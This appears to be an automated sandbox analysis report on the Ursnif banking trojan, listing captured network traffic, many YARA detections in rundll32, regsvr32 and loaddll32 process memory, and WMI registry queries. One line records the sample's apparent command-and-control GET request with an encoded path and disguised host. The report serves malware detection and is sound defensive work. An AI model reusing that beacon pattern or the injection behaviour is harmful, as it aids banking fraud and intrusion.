                      Source: global trafficHTTP traffic detected: GET /images/1mUl4vSxMxI/e7HhiI3PfruX2m/qXVt2BLImZpNU2AUWYoPx/KJXoqE51DtcFrNZ_/2BgDE50_2B2je1s/48lZWMnPdCpHd_2FFy/Vcq64rYip/9aN0bRvWizmkP5fXR2T3/jiHfK2wSGdTtZ8VP53I/SUMESuf_2FBQAkd3zXxfOT/_2BcxECgxKRoa/s8ZW5dhr/E0BgSy4u3Bh6HSi/j.avi HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: ocsp.sca1b.amazontrust.comConnection: Keep-Alive
                      Source: unknownHTTPS traffic detected: 104.20.184.68:443 -> 192.168.2.7:49722 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.20.184.68:443 -> 192.168.2.7:49723 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.70.134:443 -> 192.168.2.7:49741 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.70.134:443 -> 192.168.2.7:49742 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.2.70:443 -> 192.168.2.7:49748 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.2.70:443 -> 192.168.2.7:49747 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.217.19.102:443 -> 192.168.2.7:49745 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.217.19.102:443 -> 192.168.2.7:49746 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.7:49776 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 87.248.118.23:443 -> 192.168.2.7:49779 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.7:49777 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.7:49778 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 87.248.118.23:443 -> 192.168.2.7:49780 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 0000002C.00000003.488597994.0000000006C68000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.322676857.0000000005168000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.474137548.0000000004CC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.322202508.0000000005168000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.473987515.0000000004CC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.322499280.0000000005168000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002C.00000003.488543169.0000000006C68000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.504757746.00000000033E8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000003.417091528.00000000056A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000002.530490300.00000000056A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002C.00000003.488696812.0000000006C68000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000003.416892582.00000000056A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002C.00000003.488440717.0000000006C68000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000003.416449935.00000000056A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.473902712.0000000004CC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.505290500.00000000033E8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.474356584.0000000004CC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000003.417147272.00000000056A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000003.416620379.00000000056A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.505377175.00000000033E8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002C.00000003.488723167.0000000006C68000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.504698368.00000000033E8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000003.417041948.00000000056A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.474088169.0000000004CC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.528892428.0000000004CC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.504300183.00000000033E8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.322381939.0000000005168000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.322406561.0000000005168000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.504841805.00000000033E8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.322337741.0000000005168000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.474318739.0000000004CC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.322575665.0000000005168000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.504617318.00000000033E8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.504419460.00000000033E8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002C.00000003.488754897.0000000006C68000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.474399932.0000000004CC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002C.00000003.488667528.0000000006C68000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002C.00000003.488635694.0000000006C68000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000003.416772424.00000000056A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.530985686.0000000005168000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.322291731.0000000005168000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.474430335.0000000004CC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000003.416968580.00000000056A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 5004, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 5828, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 1404, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4868, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7100, type: MEMORYSTR
                      Source: Yara matchFile source: 25.2.rundll32.exe.510000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.0.rundll32.exe.510000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.rundll32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.0.rundll32.exe.510000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.0.rundll32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 33.2.rundll32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.47e0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 34.2.rundll32.exe.7b0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.2ba0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.0.rundll32.exe.32a0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.26d0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 27.2.rundll32.exe.49a0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.26d0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 33.2.rundll32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 38.2.rundll32.exe.610000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 30.2.rundll32.exe.29f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 44.2.rundll32.exe.29f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.0.rundll32.exe.3ef0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.rundll32.exe.920000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.0.rundll32.exe.3ef0000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.0.rundll32.exe.400000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 43.2.rundll32.exe.29f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.2cf0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.3610000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.1420000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.7f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 29.2.rundll32.exe.29f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.33b0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.rundll32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.rundll32.exe.32a0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.0.rundll32.exe.3ef0000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.0.rundll32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 33.2.rundll32.exe.2df0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.27c0000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.0.rundll32.exe.32a0000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 36.2.rundll32.exe.2a00000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.0.rundll32.exe.400000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.0.rundll32.exe.3ef0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 40.2.rundll32.exe.2ad0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000009.00000002.310878760.00000000033B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000024.00000002.420794237.0000000002A00000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000000.345060840.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.518028253.0000000001420000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.294274391.0000000003610000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.522287201.0000000002CF0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.522835823.00000000026D0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000002.520736013.0000000002DF0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000000.340961934.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000028.00000002.441408261.0000000002AD0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000002.426506350.00000000007B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002C.00000002.502483591.00000000029F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000000.366167651.0000000000510000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000000.346648661.00000000032A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000002.512763307.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.433128810.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.329480680.0000000002BA0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.513121198.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002B.00000002.464297747.00000000029F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000002.380004706.00000000029F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.523877392.00000000027C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.305530234.00000000047E0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001B.00000002.372926133.00000000049A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.438165350.00000000032A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000000.342868805.00000000032A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.320841608.00000000007F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000002.459018631.0000000000510000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000002.389489795.00000000029F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000000.364022083.0000000003EF0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.347833864.0000000000920000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000000.371029885.0000000003EF0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000026.00000002.477089969.0000000000610000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.512650162.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000000.361319898.0000000000510000.00000040.00000001.sdmp, type: MEMORY

                      E-Banking Fraud:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 0000002C.00000003.488597994.0000000006C68000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.322676857.0000000005168000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.474137548.0000000004CC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.322202508.0000000005168000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.473987515.0000000004CC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.322499280.0000000005168000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002C.00000003.488543169.0000000006C68000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.504757746.00000000033E8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000003.417091528.00000000056A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000002.530490300.00000000056A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002C.00000003.488696812.0000000006C68000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000003.416892582.00000000056A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002C.00000003.488440717.0000000006C68000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000003.416449935.00000000056A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.473902712.0000000004CC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.505290500.00000000033E8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.474356584.0000000004CC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000003.417147272.00000000056A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000003.416620379.00000000056A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.505377175.00000000033E8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002C.00000003.488723167.0000000006C68000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.504698368.00000000033E8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000003.417041948.00000000056A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.474088169.0000000004CC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.528892428.0000000004CC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.504300183.00000000033E8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.322381939.0000000005168000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.322406561.0000000005168000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.504841805.00000000033E8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.322337741.0000000005168000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.474318739.0000000004CC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.322575665.0000000005168000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.504617318.00000000033E8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.504419460.00000000033E8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002C.00000003.488754897.0000000006C68000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.474399932.0000000004CC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002C.00000003.488667528.0000000006C68000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002C.00000003.488635694.0000000006C68000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000003.416772424.00000000056A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.530985686.0000000005168000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.322291731.0000000005168000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.474430335.0000000004CC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000003.416968580.00000000056A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 5004, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 5828, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 1404, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4868, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7100, type: MEMORYSTR
                      Source: Yara matchFile source: 25.2.rundll32.exe.510000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.0.rundll32.exe.510000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.rundll32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.0.rundll32.exe.510000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.0.rundll32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 33.2.rundll32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.47e0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 34.2.rundll32.exe.7b0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.2ba0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.0.rundll32.exe.32a0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.26d0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 27.2.rundll32.exe.49a0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.26d0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 33.2.rundll32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 38.2.rundll32.exe.610000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 30.2.rundll32.exe.29f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 44.2.rundll32.exe.29f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.0.rundll32.exe.3ef0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.rundll32.exe.920000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.0.rundll32.exe.3ef0000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.0.rundll32.exe.400000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 43.2.rundll32.exe.29f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.2cf0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.3610000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.1420000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.7f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 29.2.rundll32.exe.29f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.33b0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.rundll32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.rundll32.exe.32a0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.0.rundll32.exe.3ef0000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.0.rundll32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 33.2.rundll32.exe.2df0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.27c0000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.0.rundll32.exe.32a0000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 36.2.rundll32.exe.2a00000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.0.rundll32.exe.400000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.0.rundll32.exe.3ef0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 40.2.rundll32.exe.2ad0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000009.00000002.310878760.00000000033B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000024.00000002.420794237.0000000002A00000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000000.345060840.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.518028253.0000000001420000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.294274391.0000000003610000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.522287201.0000000002CF0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.522835823.00000000026D0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000002.520736013.0000000002DF0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000000.340961934.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000028.00000002.441408261.0000000002AD0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000002.426506350.00000000007B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002C.00000002.502483591.00000000029F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000000.366167651.0000000000510000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000000.346648661.00000000032A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000002.512763307.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.433128810.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.329480680.0000000002BA0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.513121198.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002B.00000002.464297747.00000000029F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000002.380004706.00000000029F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.523877392.00000000027C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.305530234.00000000047E0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001B.00000002.372926133.00000000049A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.438165350.00000000032A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000000.342868805.00000000032A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.320841608.00000000007F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000002.459018631.0000000000510000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000002.389489795.00000000029F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000000.364022083.0000000003EF0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.347833864.0000000000920000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000000.371029885.0000000003EF0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000026.00000002.477089969.0000000000610000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.512650162.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000000.361319898.0000000000510000.00000040.00000001.sdmp, type: MEMORY

                      System Summary:

                      barindex
                      Writes or reads registry keys via WMIShow sources
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
